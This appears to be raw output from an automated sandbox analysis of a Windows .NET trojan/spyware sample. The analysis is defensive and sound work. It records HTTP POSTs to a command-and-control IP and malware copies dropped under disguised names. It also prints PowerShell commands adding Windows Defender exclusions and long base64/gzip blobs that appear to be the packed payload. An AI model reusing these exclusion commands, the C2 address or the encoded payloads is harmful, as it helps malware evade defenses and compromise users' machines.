Source: unknown TCP traffic detected without corresponding DNS query: 109.107.182.145
Source: unknown TCP traffic detected without corresponding DNS query: 109.107.182.145
Source: unknown TCP traffic detected without corresponding DNS query: 109.107.182.145
Source: unknown TCP traffic detected without corresponding DNS query: 109.107.182.145
Source: unknown TCP traffic detected without corresponding DNS query: 109.107.182.145
Source: unknown TCP traffic detected without corresponding DNS query: 109.107.182.145
Source: unknown TCP traffic detected without corresponding DNS query: 109.107.182.145
Source: unknown TCP traffic detected without corresponding DNS query: 109.107.182.145
Source: unknown TCP traffic detected without corresponding DNS query: 109.107.182.145
Source: unknown TCP traffic detected without corresponding DNS query: 109.107.182.145
Source: unknown TCP traffic detected without corresponding DNS query: 109.107.182.145
Source: unknown TCP traffic detected without corresponding DNS query: 109.107.182.145
Source: unknown TCP traffic detected without corresponding DNS query: 109.107.182.145
Source: unknown TCP traffic detected without corresponding DNS query: 109.107.182.145
Source: unknown TCP traffic detected without corresponding DNS query: 109.107.182.145
Source: unknown TCP traffic detected without corresponding DNS query: 109.107.182.145
Source: unknown TCP traffic detected without corresponding DNS query: 109.107.182.145
Source: unknown TCP traffic detected without corresponding DNS query: 109.107.182.145
Source: unknown TCP traffic detected without corresponding DNS query: 109.107.182.145
Source: unknown TCP traffic detected without corresponding DNS query: 109.107.182.145
Source: unknown TCP traffic detected without corresponding DNS query: 109.107.182.145
Source: unknown TCP traffic detected without corresponding DNS query: 109.107.182.145
Source: unknown TCP traffic detected without corresponding DNS query: 109.107.182.145
Source: unknown TCP traffic detected without corresponding DNS query: 109.107.182.145
Source: unknown TCP traffic detected without corresponding DNS query: 109.107.182.145
Source: unknown TCP traffic detected without corresponding DNS query: 109.107.182.145
Source: unknown TCP traffic detected without corresponding DNS query: 109.107.182.145
Source: unknown TCP traffic detected without corresponding DNS query: 109.107.182.145
Source: unknown TCP traffic detected without corresponding DNS query: 109.107.182.145
Source: unknown TCP traffic detected without corresponding DNS query: 109.107.182.145
Source: unknown TCP traffic detected without corresponding DNS query: 109.107.182.145
Source: unknown TCP traffic detected without corresponding DNS query: 109.107.182.145
Source: unknown TCP traffic detected without corresponding DNS query: 109.107.182.145
Source: unknown TCP traffic detected without corresponding DNS query: 109.107.182.145
Source: unknown TCP traffic detected without corresponding DNS query: 109.107.182.145
Source: unknown TCP traffic detected without corresponding DNS query: 109.107.182.145
Source: unknown TCP traffic detected without corresponding DNS query: 109.107.182.145
Source: unknown TCP traffic detected without corresponding DNS query: 109.107.182.145
Source: unknown TCP traffic detected without corresponding DNS query: 109.107.182.145
Source: unknown TCP traffic detected without corresponding DNS query: 109.107.182.145
Source: unknown TCP traffic detected without corresponding DNS query: 109.107.182.145
Source: unknown TCP traffic detected without corresponding DNS query: 109.107.182.145
Source: unknown TCP traffic detected without corresponding DNS query: 109.107.182.145
Source: unknown TCP traffic detected without corresponding DNS query: 109.107.182.145
Source: unknown TCP traffic detected without corresponding DNS query: 109.107.182.145
Source: unknown TCP traffic detected without corresponding DNS query: 109.107.182.145
Source: unknown HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002D96000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://109.107.182.145/
Source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://109.107.182.145/ExternalVm_CpuGameWindows.php
Source: powershell.exe, 00000001.00000002.2656640543.000001BDF7D80000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2654509364.000002836EA10000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micros
Source: powershell.exe, 00000001.00000002.2444317338.000001BD90075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2471826648.0000017490075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2731389868.000001DB291A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000008.00000002.1975526047.000001DB19358000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1810438460.000001BD80227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1855541530.0000028356938000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1876718568.000001DC29717000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1814710733.0000017480228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1975526047.000001DB19358000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: fDTPlvsGfH.exe, 00000000.00000002.1670534980.0000000002681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1810438460.000001BD80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1855541530.0000028356711000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1876718568.000001DC294F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1814710733.0000017480001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1975526047.000001DB19131000.00000004.00000800.00020000.00000000.sdmp, nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002D96000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1810438460.000001BD80227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1855541530.0000028356938000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1876718568.000001DC29717000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1814710733.0000017480228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1975526047.000001DB19358000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000008.00000002.1975526047.000001DB19358000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.2653419167.000001BDF7D4C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
Source: powershell.exe, 00000008.00000002.2811470724.000001DB315B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.
Source: powershell.exe, 00000004.00000002.2632823645.000001DC416B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000001.00000002.1810438460.000001BD80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1855541530.0000028356711000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1876718568.000001DC294F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1814710733.0000017480001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1975526047.000001DB19131000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000008.00000002.2731389868.000001DB291A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.2731389868.000001DB291A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.2731389868.000001DB291A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000008.00000002.1975526047.000001DB19358000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.2444317338.000001BD90075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2471826648.0000017490075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2731389868.000001DB291A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp, nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002D96000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp, nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002D96000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Creates a window with clipboard capturing capabilities
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Window created: window name: CLIPBRDWNDCLASS

System Summary
barindex
.NET source code contains very large strings
Source: fDTPlvsGfH.exe, s67.cs Long String: Length: 1085504
Abnormal high CPU Usage
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Process Stats: CPU usage > 49%
Creates files inside the system directory
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Windows\Downloaded Program Files\MoUsoCoreWorker.exe Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Windows\Downloaded Program Files\MoUsoCoreWorker.exe\:Zone.Identifier:$DATA Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Windows\Downloaded Program Files\1f93f77a7f4778 Jump to behavior
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Detected potential crypto function
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Code function: 0_2_00007FFD9B8C3415 0_2_00007FFD9B8C3415
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Code function: 0_2_00007FFD9B8B1EC3 0_2_00007FFD9B8B1EC3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B8853F2 1_2_00007FFD9B8853F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B8853F2 4_2_00007FFD9B8853F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00007FFD9B9630E9 6_2_00007FFD9B9630E9
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\Desktop\AHvxDOtC.log 2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
Source: Joe Sandbox View Dropped File: C:\Users\user\Desktop\AZWFwAgV.log CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
Sample file is different than original file name gathered from version info
Source: fDTPlvsGfH.exe, 00000000.00000002.1742365987.000000001BC9F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs fDTPlvsGfH.exe
Source: fDTPlvsGfH.exe, 00000000.00000002.1742365987.000000001BC9F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs fDTPlvsGfH.exe
Source: fDTPlvsGfH.exe, 00000000.00000000.1623414051.0000000000062000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs fDTPlvsGfH.exe
Source: fDTPlvsGfH.exe, 00000000.00000002.1739558969.000000001B232000.00000002.00000001.01000000.00000000.sdmp Binary or memory string: OriginalFilenameq944h9VdeekiaLj6nIEA0nxdMfYwMGO54 vs fDTPlvsGfH.exe
Uses 32bit PE files
Source: fDTPlvsGfH.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: fDTPlvsGfH.exe, E32.cs Cryptographic APIs: 'TransformBlock'
Source: fDTPlvsGfH.exe, E32.cs Cryptographic APIs: 'TransformFinalBlock'
Source: fDTPlvsGfH.exe, E32.cs Cryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
Source: fDTPlvsGfH.exe, s67.cs Base64 encoded string: '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
Source: fDTPlvsGfH.exe, 8B6.cs Base64 encoded string: 'H4sIAAAAAAAEAMsoKSkottLXzyzIzEvL18vM188qzs8DACTOYY8WAAAA', 'H4sIAAAAAAAACssoKSkottLXTyzI1Mss0CtO0k9Pzc8sAABsWDNKFwAAAA=='
Source: fDTPlvsGfH.exe, 76n.cs Base64 encoded string: 'KFedVk6Jp6daKp14vgxDdZRktmOg5lwc5CA7/fZyiXHMJeSDNVMb6pS/Ws+8RCCzFnl8vTvVDhuqGlce+glEtxuqKS8O8c3gtQa1djaWX8mSMgRcZkKB/b1CbeNC8zbp/fFbbK3TR40223KM0fny1Q==', 'L0WK91MRN8GPeU+oikW92KUnyNkiIPnSvolXk+UKA1aI3vP6rVo6Me+pxgOllrKJDdcmOZ4Adlt6PE9bkEGQVEwEvDCQKnoRPibOJmhL7yvD+1TdQ9V8ZvXogsu4ei+AJzju2B/7qIn98KgLxRcntHsrKHzTDgFsGp0v47jfJgF90xsw1m8GRmidRSyW2hoEPmZLPOgf+RtuUG1euK3l1Naou827rapizdphJfuIw6pLdyR0oIKGmg137zZaRZd6'
Source: fDTPlvsGfH.exe, 52Z.cs Base64 encoded string: 'ICBfX18gICAgICAgICAgIF8gICAgICBfX18gICAgICAgICAgICAgXyAgICAgICAgXyAgIF9fXyAgICBfIF9fX19fIA0KIHwgICBcIF9fIF8gXyBffCB8X18gIC8gX198XyBfIF8gIF8gX198IHxfIF9fIF98IHwgfCBfIFwgIC9fXF8gICBffA0KIHwgfCkgLyBfYCB8ICdffCAvIC8gfCAoX198ICdffCB8fCAoXy08ICBfLyBfYCB8IHwgfCAgIC8gLyBfIFx8IHwgIA0KIHxfX18vXF9fLF98X3wgfF9cX1wgIFxfX198X3wgIFxfLCAvX18vXF9fXF9fLF98X3wgfF98X1wvXy8gXF9cX3wgIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHxfXy8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA=='
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@27/397@0/2
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\hGwsXsdP.log Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5980:120:WilError_03
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6980:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6672:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7156:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7408:120:WilError_03
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\e32e8e8116ffca3524c66ea65e2eea691227f6f4e844f9dca8aabb77b799c790
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6264:120:WilError_03
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\AppData\Local\Temp\v1ufzUQx4z Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\46FAiS0S6O.bat"
Source: fDTPlvsGfH.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: fDTPlvsGfH.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: fDTPlvsGfH.exe ReversingLabs: Detection: 78%
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File read: C:\Users\user\Desktop\fDTPlvsGfH.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\fDTPlvsGfH.exe "C:\Users\user\Desktop\fDTPlvsGfH.exe"
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe'
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Downloaded Program Files\MoUsoCoreWorker.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Start Menu\Programs\Accessories\csrss.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\46FAiS0S6O.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe "C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe"
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe' Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Downloaded Program Files\MoUsoCoreWorker.exe' Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe' Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe' Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Start Menu\Programs\Accessories\csrss.exe' Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\46FAiS0S6O.bat" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe "C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe"
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: profapi.dll Jump to behavior
